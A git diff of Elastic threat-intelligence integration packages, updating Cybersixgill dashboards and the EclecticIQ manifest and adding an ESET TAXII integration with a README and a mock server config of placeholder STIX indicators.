@@ -101,7 +120,7 @@ "id": "", "params": { "fontSize": 12, - "markdown": "**Navigation**\n\n[Cybersixgill Overview](/app/dashboards#/view/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738) \n[Cybersixgill Files](/app/dashboards#/view/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738) \n**[Cybersixgill URLs (This Page)](/app/dashboards#/view/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738)** \n\n[Integrations Page](/app/integrations/detail/ti_cybersixgill/overview)\n\n\n**Overview**\n\nThis dashboard is an overview of the different threat intelligence indicators with a **threat.indicator.type: url**. \n\nThe dashboard is made to provide general statistics and show the health of your indicators like popular domains, file extensions, statistics about how many unique indicators are ingested and other relevant information.", + "markdown": "**Navigation**\n\n[Cybersixgill Overview](/app/dashboards#/view/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738) \n[Cybersixgill Files](/app/dashboards#/view/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738) \n**[Cybersixgill URLs (This Page)](/app/dashboards#/view/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738)** \n\n[Integrations Page](/app/integrations/detail/ti_cybersixgill/overview)\n\n\n**Overview**\n\nThis dashboard is an overview of the different threat intelligence indicators with a **threat.indicator.type: url**. \n\nThe dashboard is made to provide general statistics and show the health of your indicators like popular domains, file extensions, statistics about how many unique indicators are ingested and other relevant information. The dashboard is made to provide general statistics and show the health of the ingestion of indicators from Cybersixgill. The dashboard only shows the active indicators that are not expired. The indicators are expired after the duration set by `IOC Expiration Duration` in the integration settings since the time they are created(`@timestamp`).", "openLinksInNewTab": false }, "title": "", @@ -118,8 +137,7 @@ }, "panelIndex": "4c3ed6e1-8b4e-4eab-8d84-70ed4f506216", "title": "Files Navigation Textbox [Logs AbuseCH]", - "type": "visualization", - "version": "8.7.1" + "type": "visualization" }, { "embeddableConfig": { @@ -190,8 +208,7 @@ }, "panelIndex": "73a752f9-bde5-4396-8ede-e9e77a37182d", "title": "Unique File Extensions [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -262,8 +279,7 @@ }, "panelIndex": "02f1732b-a981-4fba-8b27-b944f2f3c98c", "title": "Unique Domains [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -362,8 +378,7 @@ }, "panelIndex": "8994501a-1550-4cf2-857f-d6b6491ffb62", "title": "Most Popular Domains [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -464,8 +479,7 @@ }, "panelIndex": "ab7ab31c-e76f-4613-b17d-fdd909f17e0d", "title": "Percentage of URL Schema used [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -567,8 +581,7 @@ }, "panelIndex": "fda93ed1-72f0-4489-80b7-9e69d14f30aa", "title": "Most Popular File Extensions [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -669,8 +682,7 @@ }, "panelIndex": "08fe9c8a-d5d8-4c8f-ab42-b0cfb0390008", "title": "Mitre Tactics ID [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -771,20 +783,17 @@ }, "panelIndex": "a828d701-6a36-4401-8b35-419b4454c6fc", "title": "Mitre Tactics Name [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" } ], "timeRestore": false, "title": "[Logs Cybersixgill] URLs", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-07-12T04:46:26.520Z", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-15T20:01:08.837Z", "id": "ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738", - "migrationVersion": { - "dashboard": "8.7.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -801,6 +810,11 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", + "type": "index-pattern" + }, { "id": "logs-*", "name": "73a752f9-bde5-4396-8ede-e9e77a37182d:indexpattern-datasource-current-indexpattern", @@ -875,7 +889,13 @@ "id": "ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738", "name": "tag-ref-ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738", "type": "tag" + }, + { + "id": "ti_cybersixgill-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738.json b/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738.json index 134f861b7eb..33001112266 100644 --- a/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738.json +++ b/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738.json @@ -45,6 +45,25 @@ "data_stream.dataset": "ti_cybersixgill.threat" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "type": "exists" + }, + "query": { + "exists": { + "field": "labels.is_ioc_transform_source" + } + } } ], "query": { @@ -79,7 +98,7 @@ "description": "", "params": { "fontSize": 12, - "markdown": "**Navigation**\n\n**[Cybersixgill Overview (This Page)](/app/dashboards#/view/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738)** \n[Cybersixgill Files](/app/dashboards#/view/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738) \n[Cybersixgill URLs](/app/dashboards#/view/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738) \n\n[Integrations Page](/app/integrations/detail/ti_cybersixgill/overview)\n\n\n**Overview**\n\nThis dashboard is a health overview related to the Cybersixgill Darkfeed integration.\n\nThe dashboard is made to provide general statistics and show the health of the ingestion of indicators from Cybersixgill. ", + "markdown": "**Navigation**\n\n**[Cybersixgill Overview (This Page)](/app/dashboards#/view/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738)** \n[Cybersixgill Files](/app/dashboards#/view/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738) \n[Cybersixgill URLs](/app/dashboards#/view/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738) \n\n[Integrations Page](/app/integrations/detail/ti_cybersixgill/overview)\n\n\n**Overview**\n\nThis dashboard is a health overview related to the Cybersixgill Darkfeed integration.\n\nThe dashboard is made to provide general statistics and show the health of the ingestion of indicators from Cybersixgill. The dashboard only shows the active indicators that are not expired. The indicators are expired after the duration set by `IOC Expiration Duration` in the integration settings since the time they are created(`@timestamp`).", "openLinksInNewTab": false }, "title": "Overview Textbox [Logs AbuseCH]", @@ -95,8 +114,7 @@ "y": 0 }, "panelIndex": "555e9e6c-04e9-4022-b6df-bda07dde30c4", - "type": "visualization", - "version": "8.7.1" + "type": "visualization" }, { "embeddableConfig": { @@ -242,8 +260,7 @@ }, "panelIndex": "e971fedd-6afd-4d03-93ac-d0c751acc254", "title": "Feed and Indicator Selector [Logs Cybersixgill]", - "type": "visualization", - "version": "8.7.1" + "type": "visualization" }, { "embeddableConfig": { @@ -318,8 +335,7 @@ }, "panelIndex": "d37eb797-f273-43c2-9004-b947891cce55", "title": "Total Indicators [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -439,8 +455,7 @@ }, "panelIndex": "86d83606-4176-44b1-b3f3-011d5b5b4b58", "title": "Total Indicators per Provider [Logs AbuseCH]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -541,8 +556,7 @@ }, "panelIndex": "f3141aca-8e35-48a7-9ac8-cc43fa1a47c0", "title": "Mitre Tactics [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -616,8 +630,7 @@ }, "panelIndex": "6509dcc9-bb9c-4c1f-80e9-612f67ada340", "title": "Total Datastreams [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -757,20 +770,17 @@ }, "panelIndex": "aab4fac0-d39c-4521-aa9b-0a49d5938e9e", "title": "Indicators ingested per Datastream [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" } ], "timeRestore": false, "title": "[Logs Cybersixgill] Overview", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-07-12T04:46:34.989Z", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-15T20:00:21.661Z", "id": "ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738", - "migrationVersion": { - "dashboard": "8.7.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -782,6 +792,11 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", + "type": "index-pattern" + }, { "id": "logs-*", "name": "e971fedd-6afd-4d03-93ac-d0c751acc254:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", @@ -861,7 +876,13 @@ "id": "ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738", "name": "tag-ref-ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738", "type": "tag" + }, + { + "id": "ti_cybersixgill-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/ti_cybersixgill/kibana/tag/ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738.json b/packages/ti_cybersixgill/kibana/tag/ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738.json index 54f4421a486..03b8557e40e 100644 --- a/packages/ti_cybersixgill/kibana/tag/ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738.json +++ b/packages/ti_cybersixgill/kibana/tag/ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738.json @@ -4,12 +4,11 @@ "description": "", "name": "Cybersixgill" }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-07-12T04:45:21.934Z", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-15T19:20:05.636Z", "id": "ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738", - "migrationVersion": { - "tag": "8.0.0" - }, + "managed": true, "references": [], - "type": "tag" + "type": "tag", + "typeMigrationVersion": "8.0.0" } \ No newline at end of file diff --git a/packages/ti_cybersixgill/kibana/tag/ti_cybersixgill-security-solution-default.json b/packages/ti_cybersixgill/kibana/tag/ti_cybersixgill-security-solution-default.json new file mode 100644 index 00000000000..2ea984f8795 --- /dev/null +++ b/packages/ti_cybersixgill/kibana/tag/ti_cybersixgill-security-solution-default.json @@ -0,0 +1,14 @@ +{ + "attributes": { + "color": "#FEC514", + "description": "Tag defined in package-spec", + "name": "Security Solution" + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-15T19:20:05.690Z", + "id": "ti_cybersixgill-security-solution-default", + "managed": false, + "references": [], + "type": "tag", + "typeMigrationVersion": "8.0.0" +} \ No newline at end of file diff --git a/packages/ti_cybersixgill/manifest.yml b/packages/ti_cybersixgill/manifest.yml index 0ad8dbfc718..89fd7352106 100644 --- a/packages/ti_cybersixgill/manifest.yml +++ b/packages/ti_cybersixgill/manifest.yml @@ -1,13 +1,13 @@ name: ti_cybersixgill title: Cybersixgill -version: "1.25.1" +version: "1.27.0" description: Ingest threat intelligence indicators from Cybersixgill with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: ["security", "threat_intel"] conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 policy_templates: - name: cybersixgill title: Cybersixgill Threat Intel diff --git a/packages/ti_eclecticiq/changelog.yml b/packages/ti_eclecticiq/changelog.yml index eb31a43b556..d440a40876a 100644 --- a/packages/ti_eclecticiq/changelog.yml +++ b/packages/ti_eclecticiq/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.3.0" + changes: + - description: Set sensitive values as secret, upgrade to package spec 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9238 - version: "0.2.0" changes: - description: Enable SSL configuration for requests diff --git a/packages/ti_eclecticiq/manifest.yml b/packages/ti_eclecticiq/manifest.yml index 61ca3e7083f..994a8baa49e 100644 --- a/packages/ti_eclecticiq/manifest.yml +++ b/packages/ti_eclecticiq/manifest.yml @@ -1,7 +1,7 @@ -format_version: 3.0.0 +format_version: 3.0.3 name: ti_eclecticiq title: EclecticIQ -version: 0.2.0 +version: 0.3.0 description: Ingest threat intelligence from EclecticIQ with Elastic Agent type: integration categories: @@ -9,7 +9,7 @@ categories: - threat_intel conditions: kibana: - version: ^8.8.2 + version: ^8.12.0 elastic: subscription: basic icons: @@ -33,10 +33,11 @@ policy_templates: show_user: true required: true - name: token - type: text + type: password title: API token show_user: true required: true + secret: true - name: ssl type: yaml title: SSL Configuration @@ -72,7 +73,6 @@ policy_templates: # xw23l/k8RoD1wRWaDVbgpjwSzt+kl+vJE/ip2w3h69eEZ9wbo6scRO5lCO2JM4Pr # 7RhLQyWn2u00L7/9Omw= # -----END CERTIFICATE----- - owner: github: elastic/security-service-integrations type: partner diff --git a/packages/ti_eset/LICENSE.txt b/packages/ti_eset/LICENSE.txt new file mode 100644 index 00000000000..809108b857f --- /dev/null +++ b/packages/ti_eset/LICENSE.txt @@ -0,0 +1,93 @@ +Elastic License 2.0 + +URL: https://www.elastic.co/licensing/elastic-license + +## Acceptance + +By using the software, you agree to all of the terms and conditions below. + +## Copyright License + +The licensor grants you a non-exclusive, royalty-free, worldwide, +non-sublicensable, non-transferable license to use, copy, distribute, make +available, and prepare derivative works of the software, in each case subject to +the limitations and conditions below. + +## Limitations + +You may not provide the software to third parties as a hosted or managed +service, where the service provides users with access to any substantial set of +the features or functionality of the software. + +You may not move, change, disable, or circumvent the license key functionality +in the software, and you may not remove or obscure any functionality in the +software that is protected by the license key. + +You may not alter, remove, or obscure any licensing, copyright, or other notices +of the licensor in the software. Any use of the licensor’s trademarks is subject +to applicable law. + +## Patents + +The licensor grants you a license, under any patent claims the licensor can +license, or becomes able to license, to make, have made, use, sell, offer for +sale, import and have imported the software, in each case subject to the +limitations and conditions in this license. This license does not cover any +patent claims that you cause to be infringed by modifications or additions to +the software. If you or your company make any written claim that the software +infringes or contributes to infringement of any patent, your patent license for +the software granted under these terms ends immediately. If your company makes +such a claim, your patent license ends immediately for work on behalf of your +company. + +## Notices + +You must ensure that anyone who gets a copy of any part of the software from you +also gets a copy of these terms. + +If you modify the software, you must include in any modified copies of the +software prominent notices stating that you have modified the software. + +## No Other Rights + +These terms do not imply any licenses other than those expressly granted in +these terms. + +## Termination + +If you use the software in violation of these terms, such use is not licensed, +and your licenses will automatically terminate. If the licensor provides you +with a notice of your violation, and you cease all violation of this license no +later than 30 days after you receive that notice, your licenses will be +reinstated retroactively. However, if you violate these terms after such +reinstatement, any additional violation of these terms will cause your licenses +to terminate automatically and permanently. + +## No Liability + +*As far as the law allows, the software comes as is, without any warranty or +condition, and the licensor will not be liable to you for any damages arising +out of these terms or the use or nature of the software, under any kind of +legal claim.* + +## Definitions + +The **licensor** is the entity offering these terms, and the **software** is the +software the licensor makes available under these terms, including any portion +of it. + +**you** refers to the individual or entity agreeing to these terms. + +**your company** is any legal entity, sole proprietorship, or other kind of +organization that you work for, plus all organizations that have control over, +are under the control of, or are under common control with that +organization. **control** means ownership of substantially all the assets of an +entity, or the power to direct its management and policies by vote, contract, or +otherwise. Control can be direct or indirect. + +**your licenses** are all the licenses granted to you for the software under +these terms. + +**use** means anything you do with the software requiring one of your licenses. + +**trademark** means trademarks, service marks, and similar rights. diff --git a/packages/ti_eset/_dev/build/build.yml b/packages/ti_eset/_dev/build/build.yml new file mode 100644 index 00000000000..2bfcfc223b0 --- /dev/null +++ b/packages/ti_eset/_dev/build/build.yml @@ -0,0 +1,3 @@ +dependencies: + ecs: + reference: "git@v8.11.0" diff --git a/packages/ti_eset/_dev/build/docs/README.md b/packages/ti_eset/_dev/build/docs/README.md new file mode 100644 index 00000000000..a9841015836 --- /dev/null +++ b/packages/ti_eset/_dev/build/docs/README.md @@ -0,0 +1,133 @@ +# ESET Threat Intelligence Integration + +This integration connects with the [ESET Threat Intelligence](https://eti.eset.com/taxii2/) TAXII version 2 server. +It includes the following datasets for retrieving logs: + +| Dataset | TAXII2 Collection name | +|--------:|:-----------------------| +| apt | apt stix 2.1 | +| botnet | botnet stix 2.1 | +| cc | botnet.cc stix 2.1 | +| domains | domain stix 2.1 | +| files | file stix 2.1 | +| ip | ip stix 2.1 | +| url | url stix 2.1 | + +## Expiration of Indicators of Compromise (IOCs) +The ingested IOCs expire after certain duration. An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created for every source index to +facilitate only active IOCs be available to the end users. Each transform creates a destination index named `logs-ti_eset_latest.dest_*` which only contains active and unexpired IOCs. +Destinations indices are aliased to `logs-ti_eset_latest.`. + +| Source Datastream | Destination Index Pattern | Destination Alias | +|:-------------------------|:-----------------------------------|-----------------------------| +| `logs-ti_eset.apt-*` | logs-ti_eset_latest.dest_apt-* | logs-ti_eset_latest.apt | +| `logs-ti_eset.botnet-*` | logs-ti_eset_latest.dest_botnet-* | logs-ti_eset_latest.botnet | +| `logs-ti_eset.cc-*` | logs-ti_eset_latest.dest_cc-* | logs-ti_eset_latest.cc | +| `logs-ti_eset.domains-*` | logs-ti_eset_latest.dest_domains-* | logs-ti_eset_latest.domains | +| `logs-ti_eset.files-*` | logs-ti_eset_latest.dest_files-* | logs-ti_eset_latest.files | +| `logs-ti_eset.ip-*` | logs-ti_eset_latest.dest_ip-* | logs-ti_eset_latest.ip | +| `logs-ti_eset.url-*` | logs-ti_eset_latest.dest_url-* | logs-ti_eset_latest.url | + +### ILM Policy +ILM policy is added to the source indices, so it doesn't lead to unbounded growth. +Data in these source indices will be deleted after a certain number of days from ingested days: + +| Index | Deleted after | Expired after | +|-----------------------:|:--------------|---------------| +| `logs-ti_eset.apt` | 365d | 365d | +| `logs-ti_eset.botnet` | 7d | 48h | +| `logs-ti_eset.cc` | 7d | 48h | +| `logs-ti_eset.domains` | 7d | 48h | +| `logs-ti_eset.files` | 7d | 48h | +| `logs-ti_eset.ip` | 7d | 48h | +| `logs-ti_eset.url` | 7d | 48h | + +## Requirements + +Elastic Agent must be installed. +For more information, +refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +### Installing and managing an Elastic Agent: + +You have a few options for installing and managing an Elastic Agent: + +### Install a Fleet-managed Elastic Agent (recommended): + +With this approach, you install Elastic Agent and use Fleet in Kibana to define, configure, +and manage your agents in a central location. +We recommend using Fleet management because it makes the management and upgrade of your agents considerably easier. + +### Install Elastic Agent in standalone mode (advanced users): + +With this approach, +you install Elastic Agent and manually configure the agent locally on the system where it’s installed. +You are responsible for managing and upgrading the agents. +This approach is reserved for advanced users only. + +### Install Elastic Agent in a containerized environment: + +You can run Elastic Agent inside a container, either with Fleet Server or standalone. +Docker images for all versions of Elastic Agent are available from the Elastic Docker registry, +and we provide deployment manifests for running on Kubernetes. + +There are some minimum requirements for running Elastic Agent and for more information, +refer to the link [here](https://www.elastic.co/guide/en/fleet/current/elastic-agent-installation.html). + +The minimum **Kibana version** required is **8.12.0**. + +## Setup + +### Enabling the integration in Elastic: + +1. In Kibana go to Management > Integrations. +2. In "Search for integrations" search bar, type ESET Threat Intelligence. +3. Click on the "ESET Threat Intelligence" integration from the search results. +4. Click on the "Add ESET Threat Intelligence" button to add the integration. +5. Configure all required integration parameters, including username and password that you have received from ESET during onboarding process. For more information, please visit [ESET Threat Intelligence](https://www.eset.com/int/business/services/threat-intelligence/) page. +6. Enable data streams you are interested in and have access to. +7. Save the integration. + +## Logs + +### Botnet + +{{fields "botnet"}} + +{{event "botnet"}} + +### C&C + +{{fields "cc"}} + +{{event "cc"}} + +### Domains + +{{fields "domains"}} + +{{event "domains"}} + +### Malicious files + +{{fields "files"}} + +{{event "files"}} + +### IP + +{{fields "ip"}} + +{{event "ip"}} + +### APT + +{{fields "apt"}} + +{{event "apt"}} + +### URL + +{{fields "url"}} + +{{event "url"}} \ No newline at end of file diff --git a/packages/ti_eset/_dev/deploy/docker/docker-compose.yml b/packages/ti_eset/_dev/deploy/docker/docker-compose.yml new file mode 100644 index 00000000000..f6b5e406689 --- /dev/null +++ b/packages/ti_eset/_dev/deploy/docker/docker-compose.yml @@ -0,0 +1,14 @@ +version: "2.3" +services: + eti: + image: docker.elastic.co/observability/stream:v0.6.1 + ports: + - 8080 + volumes: + - ./files:/files:ro + environment: + PORT: 8080 + command: + - http-server + - --addr=:8080 + - --config=/files/config.yml diff --git a/packages/ti_eset/_dev/deploy/docker/files/config.yml b/packages/ti_eset/_dev/deploy/docker/files/config.yml new file mode 100644 index 00000000000..13f8faf014d --- /dev/null +++ b/packages/ti_eset/_dev/deploy/docker/files/config.yml @@ -0,0 +1,1071 @@ +rules: + # Botnet + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/0abb06690b0b47e49cd7794396b76b20/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "2023-10-18T02:05:09.000Z" + responses: + - status_code: 200 + headers: + X-TAXII-Date-Added-Last: "2023-10-18T02:05:10.000Z" + Content-Type: "application/taxii+json;version=2.1" + body: |- + { + "more": true, + "objects": [ + { + "id": "indicator--2c659a56-9317-4acb-8759-78490558a25d", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-18T02:05:09.000Z", + "modified": "2023-10-18T02:05:09.000Z", + "name": "https://example.com/some/path", + "description": "C&C indicates that a botnet Win32/Rescoms.B backdoor is present.", + "pattern": "[url:value = 'https://example.com/some/path']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-18T02:05:09Z", + "valid_until": "2023-10-20T02:05:09Z", + "labels": [ + "malicious-activity" + ] + } + ], + "next": "MjAyMy0xMC0xOFQwMDowNToxMy4xNDU2NTQrMDA6MDB8aW5kaWNhdG9yLS0yYzY1OWE1Ni05MzE3LTRhY2ItODc1OS03ODQ5MDU1OGEyNWQ=" + } + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/0abb06690b0b47e49cd7794396b76b20/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "2023-10-18T02:05:10.000Z" + responses: + - status_code: 200 + headers: + Content-Type: "application/taxii+json;version=2.1" + body: |- + {} + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/0abb06690b0b47e49cd7794396b76b20/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "{added_after:.*}" + responses: + - status_code: 200 + headers: + X-TAXII-Date-Added-Last: "2023-10-18T02:05:09.000Z" + Content-Type: "application/taxii+json;version=2.1" + body: |- + { + "more": true, + "objects": [ + { + "id": "indicator--80dc09fa-563f-4a9c-ad1d-655d8dffa37f", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-18T02:05:09.000Z", + "modified": "2023-10-18T02:05:09.000Z", + "name": "373d34874d7bc89fd4cefa6272ee80bf", + "description": "Each of these file hashes indicates that a variant of Win32/Rescoms.B backdoor is present.", + "pattern": "[file:hashes.'SHA-256'='b0e914d1bbe19433cc9df64ea1ca07fe77f7b150b511b786e46e007941a62bd7'] OR [file:hashes.'SHA-1'='373d34874d7bc89fd4cefa6272ee80bf'] OR [file:hashes.'MD5'='373d34874d7bc89fd4cefa6272ee80bf']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-18T02:05:09Z", + "valid_until": "2023-10-20T02:05:09Z", + "labels": [ + "malicious-activity" + ] + } + ], + "next": "MjAyMy0xMC0xOFQwMDowNToxMy4xNDU2NTQrMDA6MDB8aW5kaWNhdG9yLS0yYzY1OWE1Ni05MzE3LTRhY2ItODc1OS03ODQ5MDU1OGEyNWQ=" + } + # C&C + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/d1923a526e8f400dbb301259240ee3d5/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "2022-03-02T12:44:27.839Z" + responses: + - status_code: 200 + headers: + Content-Type: "application/taxii+json;version=2.1" + body: |- + {} + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/d1923a526e8f400dbb301259240ee3d5/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "{added_after:.*}" + responses: + - status_code: 200 + headers: + X-TAXII-Date-Added-Last: "2022-03-02T12:44:27.839Z" + Content-Type: "application/taxii+json;version=2.1" + body: |- + { + "more": true, + "objects": [ + { + "id": "indicator--34e0eaa0-d35d-4039-b801-8f05d4e16bea", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-19T02:00:09.000Z", + "modified": "2023-10-19T02:00:09.000Z", + "name": "https://example.com/some/path", + "description": "C&C of Win32/Smokeloader.H trojan", + "pattern": "[url:value='https://example.com/some/path']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-19T02:00:09Z", + "valid_until": "2023-10-21T02:00:09Z", + "labels": [ + "malicious-activity" + ] + }, + { + "id": "indicator--b02438ee-5a6d-467f-999b-f8bf2dd20b73", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-19T02:00:09.000Z", + "modified": "2023-10-19T02:00:09.000Z", + "name": "https://example.com/some/path", + "description": "C&C of Win32/TrojanDownloader.Amadey.A trojan", + "pattern": "[url:value='https://example.com/some/path']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-19T02:00:09Z", + "valid_until": "2023-10-21T02:00:09Z", + "labels": [ + "malicious-activity" + ] + } + ], + "next": "MjAyMy0xMC0xOVQwMDowMDoxNC45OTg2MTQrMDA6MDB8aW5kaWNhdG9yLS1iMDI0MzhlZS01YTZkLTQ2N2YtOTk5Yi1mOGJmMmRkMjBiNzM=" + } + # Domains + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/a34aa0a4f9de419582a883863503f9c4/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "2022-03-02T12:44:27.839Z" + responses: + - status_code: 200 + headers: + Content-Type: "application/taxii+json;version=2.1" + body: |- + {} + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/a34aa0a4f9de419582a883863503f9c4/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "{added_after:.*}" + responses: + - status_code: 200 + headers: + X-TAXII-Date-Added-Last: "2022-03-02T12:44:27.839Z" + Content-Type: "application/taxii+json;version=2.1" + body: |- + { + "more": true, + "objects": [ + { + "id": "indicator--dfb05726-f2be-43c8-a5b2-48e78cc05286", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-19T02:00:28.000Z", + "modified": "2023-10-19T02:00:28.000Z", + "name": "example.com", + "description": "Host is known to be actively distributing adware or other medium-risk software.", + "pattern": "[domain-name:value='example.com']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-19T02:00:28Z", + "valid_until": "2023-10-21T02:00:28Z", + "labels": [ + "malicious-activity" + ] + }, + { + "id": "indicator--f4f0b76e-3532-47c6-8379-93ca3ed53ca8", + "type": "indicator", + "spec_version": "indicator", + "created": "2023-10-19T02:00:28.000Z", + "modified": "2023-10-19T02:00:28.000Z", + "name": "example.com", + "description": "Host actively distributes high-severity threat in the form of malicious code.", + "pattern": "[domain-name:value='example.com']", + "pattern_type": "stix", + "pattern_version": "2.1", + "valid_from": "2023-10-19T02:00:28Z", + "valid_until": "2023-10-21T02:00:28Z", + "labels": [ + "malicious-activity" + ] + } + ], + "next": "MjAyMy0xMC0xOVQwMDowMToyMC43ODk0MjcrMDA6MDB8aW5kaWNhdG9yLS1mNGYwYjc2ZS0zNTMyLTQ3YzYtODM3OS05M2NhM2VkNTNjYTg=" + } + # Malicious files + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/ee6a153ed77e4ec3ab21e76cc2074b9f/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic dGVzdDp0ZXN0" + query_params: + match[type]: "indicator" + added_after: "2022-03-02T12:44:27.839Z" + responses: + - status_code: 200 + headers: + Content-Type: "application/taxii+json;version=2.1" + body: |- + {} + - path: /taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/ee6a153ed77e4ec3ab21e76cc2074b9f/objects/ + methods: ["GET"] + request_headers: + Authorization: + - "Basic 